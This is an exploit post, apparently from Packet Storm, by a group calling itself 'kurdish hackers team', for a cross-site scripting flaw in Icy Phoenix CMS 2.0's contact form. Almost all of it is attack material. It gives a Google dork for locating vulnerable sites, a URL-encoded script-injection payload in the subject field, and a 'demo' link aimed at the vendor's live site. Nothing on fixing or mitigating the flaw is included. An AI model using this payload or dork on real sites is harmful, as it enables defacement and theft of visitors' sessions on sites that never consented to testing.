Icy Phoenix CMS version 2.0 suffers from a cross site scripting vulnerability.
15720fc7decd54d9ee32a0151f318dd82bc8c3f227810fad4a1408017fc42cd5Icy Phoenix 2.0 CMS Remote Cross Site Scripting Vulnerability
<<!>> Found by : kurdish hackers team
<<!>> C0ntact : pshela [at] YaHoo .com
<<!>> Groups : Kurd-Team
<<!>> site : www.kurdteam.org
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script :: Icy Phoenix 2.0 CMS
<<->> home script :: http://www.icyphoenix.com/dload.php?action=file&file_id=178
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> google dork : Powered by Icy Phoenix
or
Design by Mighty Gorgon
<<->> Exploit ::
>>> www.site/path /contact_us.php?sid=9a2caa067fb983a628f27d1504eeb4a0^sender=&subject=%22%3E%3Cscript%3Ealert('hacked%20by%20kurdteam')%3C/script%3E&cc_email=1&confirm_code=&confirm_id=87cea145adae9369a3b296917a1dd501&submit=Send+e-mail
demo:
http://www.icyphoenix.com/contact_us.php?sid=9a2caa067fb983a628f27d1504eeb4a0^sender=&subject=%22%3E%3Cscript%3Ealert('hacked%20by%20kurdteam')%3C/script%3E&cc_email=1&confirm_code=&confirm_id=87cea145adae9369a3b296917a1dd501&submit=Send+e-mail
=======================================================
=======================================================
<<->> All freinds , Zryan_kurd , all member kurdish hackers team
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed